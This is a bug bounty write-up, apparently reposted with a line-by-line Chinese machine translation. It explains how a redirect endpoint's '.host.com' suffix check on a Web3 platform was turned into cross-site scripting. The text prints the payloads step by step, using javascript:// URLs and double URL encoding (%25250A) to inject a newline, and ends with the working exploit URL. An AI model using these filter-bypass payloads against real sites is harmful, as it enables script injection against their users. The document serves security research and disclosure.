$1000 Bounty: How I scaled a Self-Redirect to an XSS in a web 3.0 system at Hackenproof

渗透技巧 5个月前 admin

39 0 0

Hello everyone, in this article, I will share how I scaled from a self-redirect that redirected only to a link containing the host itself in the URL composition to a Cross-Site Scripting (XSS) attack.
大家好，在本文中，我将分享我如何从仅重定向到仅重定向到 URL 组合中包含主机本身的链接的自重定向扩展到跨站点脚本（XSS）攻击。

Initially, I came across a link that performed redirections, but it was limited to URLs that contained the host itself at the end, such as “example.host.com”:
最初，我遇到了一个执行重定向的链接，但它仅限于末尾包含主机本身的 URL，例如“example.host.com”：

https://host.com/nl/redirect?url=https://example.com.host.com

After attempts to bypass using different ways of appending “.host.com” to the end of the URL, I was unsuccessful:
在尝试使用不同的方式将“.host.com”附加到 URL 末尾后，我没有成功：

https://example.com?.host.com -> Blocked https://example.com?.host.com -> 已阻止
https://example.com/.host.com -> Blocked https://example.com/.host.com -> 已阻止
https://host.com.example.com -> Blocked https://host.com.example.com -> 已阻止
https://example.com;.host.com -> ERR_INVALID_REDIRECT

As the redirect had an <a href=”example.host.com”> tag in the HTML body, I attempted to create an XSS payload. Initially, I tried something simple:
由于重定向在 HTML 正文中有一个标记，因此我尝试创建一个 XSS 有效负载。最初，我尝试了一些简单的事情：

?url=javascript:alert(‘XSS’);.host.com -> Blocked
？url=javascript：alert（’XSS’）;。host.com -> 被阻止
?url=javascript://alert(‘XSS’);.host.com”; -> Accepted, but in this structure, JavaScript produces an error.
？url=javascript：//alert（’XSS’）;。host.com“;-> 已接受，但在此结构中，JavaScript 会产生错误。

So, I developed a more sophisticated payload:
因此，我开发了一个更复杂的有效载荷：

?url=javascript://alert(‘XSS’);url=”.host.com”; -> Accepted
？url=javascript：//alert（’XSS’）;url=“.host.com”;-> 接受

The system only accepted :// after the protocol, so to increase complexity and overcome potential blocks, I attempted to craft a payload that executed JavaScript after two slash characters (//):
系统只接受 :// 协议之后，所以为了增加复杂性并克服潜在的阻塞，我试图制作一个有效载荷，在两个斜杠字符（ // ）之后执行JavaScript：

javascript://%250Aalert(‘XSS’);url=”.host.com”;

Surprisingly, this payload was successful. However, it’s worth noting that the use of %250A did not produce //0A in the URL as expected. Instead, a CRLF injection occurred in the header, interrupting the redirection and displaying the web page without redirection.
令人惊讶的是，这个有效载荷是成功的。但是，值得注意的是，使用 %250A 没有按预期在 URL 中生成 //0A 。相反，标头中发生了 CRLF 注入，中断了重定向并在没有重定向的情况下显示网页。

00 Bounty: How I scaled a Self-Redirect to an XSS in a web 3.0 system at Hackenproof

So I thought about %250A generating a CRLF (Carriage Return Line Feed), and then I concluded that %25250A could induce %0A in HTML. I tested the theory and confirmed its effectiveness. The developers performed two rounds of URL encoding decoding. Thus, the final payload looked like this:
因此，我考虑生成 %250A 一个 CRLF（回车换行），然后我得出结论，这 %25250A 可以在 HTML %0A 中诱导。我测试了这个理论并证实了它的有效性。开发人员执行了两轮 URL 编码解码。因此，最终有效载荷如下所示：

javascript://%250A%25250Aalert(‘XSS’);url=”.host.com”;//CLICK+HERE

The Payload structure was configured as follows:
Payload 结构配置如下：

javascript://: Protocol used.
javascript:// ：使用的协议。
%25A0%25250A: %25A0 creates a CRLF injection and this breaks the redirect, with %25250A added to create a %0a after the //, resulting in javascript://%0a.
%25A0%25250A ： %25A0 创建 CRLF 注入，这会中断重定向，并在 %25250A 之后添加以创建一个 %0a // ，从而产生 javascript://%0a 。
alert('XSS-erickfernando'): JavaScript code to test execution.
alert('XSS-erickfernando') ：用于测试执行的 JavaScript 代码。
;url=".host.com": Creation of a variable to append “.host.com,” bypassing the self-redirection criterion and preventing an execution error in the JavaScript structure.
;url=".host.com" ：创建一个变量以附加“.host.com”，绕过自我重定向条件并防止 JavaScript 结构中出现执行错误。

The complete URL is composed of:
完整的 URL 由以下部分组成：

https://host.com/nl/redirect?url=javascript://%250A%25250Aalert(‘XSS-erickfernando’);url=“.host.com”;//CLICK+HERE

In HTML it looked like this:
在 HTML 中，它看起来像这样：

<a href=”javascript://%0aalert(‘XSS-erickfernandox’);url=’.host.com’;//CLICK+HERE”>

javascript://%0aalert(‘XSS-erickfernandox’);url=’.host.com’;//CLICK+HERE
</a>